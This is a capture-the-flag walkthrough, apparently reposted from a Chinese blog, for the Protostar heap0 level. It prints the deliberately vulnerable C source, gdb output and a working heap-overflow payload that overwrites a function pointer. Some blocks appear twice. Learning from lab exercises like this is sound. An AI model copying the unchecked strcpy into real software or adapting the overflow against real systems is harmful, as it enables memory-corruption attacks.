About
This level introduces heap overflows and how they can influence code flow.
This level is at /opt/protostar/bin/heap0
Source code
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
struct data {
char name[64];
};
struct fp {
int (*fp)();
};
void winner()
{
printf("level passed\n");
}
void nowinner()
{
printf("level has not been passed\n");
}
int main(int argc, char **argv)
{
struct data *d;
struct fp *f;
d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
f->fp = nowinner;
printf("data is at %p, fp is at %p\n", d, f);
strcpy(d->name, argv[1]);
f->fp();
}
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
struct data {
char name[64];
};
struct fp {
int (*fp)();
};
void winner()
{
printf("level passed\n");
}
void nowinner()
{
printf("level has not been passed\n");
}
int main(int argc, char **argv)
{
struct data *d;
struct fp *f;
d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
f->fp = nowinner;
printf("data is at %p, fp is at %p\n", d, f);
strcpy(d->name, argv[1]);
f->fp();
}
艰难地来到Heap部分。。。。。。。。。
目测得知需要通过strcpy修改f-ftp()的值来达到目的,这些在Stack中遇到不少了,这里就不多说明了。
user@protostar:/opt/protostar/bin$ gdb -q ./heap0
Reading symbols from /opt/protostar/bin/heap0...done.
(gdb) b *main
Breakpoint 1 at 0x804848c: file heap0/heap0.c, line 26.
(gdb) r
Starting program: /opt/protostar/bin/heap0
Breakpoint 1, main (argc=1, argv=0xbffff864) at heap0/heap0.c:26
26 heap0/heap0.c: No such file or directory.
in heap0/heap0.c
(gdb) p winner
$1 = {void (void)} 0x8048464 <winner>
Reading symbols from /opt/protostar/bin/heap0...done.
(gdb) b *main
Breakpoint 1 at 0x804848c: file heap0/heap0.c, line 26.
(gdb) r
Starting program: /opt/protostar/bin/heap0
Breakpoint 1, main (argc=1, argv=0xbffff864) at heap0/heap0.c:26
26 heap0/heap0.c: No such file or directory.
in heap0/heap0.c
(gdb) p winner
$1 = {void (void)} 0x8048464 <winner>
获得winner地地址是0x08048464
user@protostar:/opt/protostar/bin$ gdb -q ./heap0
Reading symbols from /opt/protostar/bin/heap0...done.
(gdb) r `python -c 'print "a"*64+"12345678901234567890"'`
Starting program: /opt/protostar/bin/heap0 `python -c 'print "a"*64+"12345678901234567890"'`
data is at 0x804a008, fp is at 0x804a050
Program received signal SIGSEGV, Segmentation fault.
0x32313039 in ?? ()
Reading symbols from /opt/protostar/bin/heap0...done.
(gdb) r `python -c 'print "a"*64+"12345678901234567890"'`
Starting program: /opt/protostar/bin/heap0 `python -c 'print "a"*64+"12345678901234567890"'`
data is at 0x804a008, fp is at 0x804a050
Program received signal SIGSEGV, Segmentation fault.
0x32313039 in ?? ()
OK,修改之。
user@protostar:/opt/protostar/bin$ ./heap0 `python -c 'print "a"*64+"12345678\x64\x84\x04\x08"'`
data is at 0x804a008, fp is at 0x804a050
level passed
data is at 0x804a008, fp is at 0x804a050
level passed
转载于:https://blog.51cto.com/terrying/1182603